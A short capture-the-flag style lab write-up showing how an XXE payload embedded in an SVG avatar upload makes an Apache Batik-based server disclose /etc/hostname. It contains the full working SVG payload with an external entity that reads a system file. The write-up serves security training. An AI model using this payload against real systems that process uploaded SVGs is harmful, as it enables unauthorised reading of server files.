Exploiting XXE via image file upload

Description

This lab lets users attach avatars to comments and uses the Apache Batik library to process avatar image files.

To solve the lab, upload an image that displays the contents of the /etc/hostname file after processing. Then use the "Submit solution" button to submit the value of the server hostname.

Approach

Upon accessing the lab, I headed straight to the comments section where I stumbled upon an image file upload functionality, which I immediately recognized as a potential avenue for exploiting XXE. To execute XXE exploitation, I needed to inject XML into the system, and SVG (Scalable Vector Graphics) files, being XML-based, presented an ideal choice. So, I crafted a sample SVG file with XML syntax like the following:

<?xml version="1.0" standalone="yes"?><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-family="Verdana" font-size="16" x="0" y="16">&xxe;</text></svg>

Then, I injected my payload into it:

<!DOCTYPE ichyaboy [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>

Combining the two, the full payload looked something like this:

<?xml version="1.0" standalone="yes"?><!DOCTYPE ichyaboy [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-family="Verdana" font-size="16" x="0" y="16">&xxe;</text></svg>

I saved this payload in a text file and uploaded it. Subsequently, upon navigating to my comment and opening the avatar, I observed the hostname appearing there. By submitting that value, I successfully solved the lab.

PreviousExploiting XInclude to retrieve files NextExploiting XXE to retrieve data by repurposing a local DTD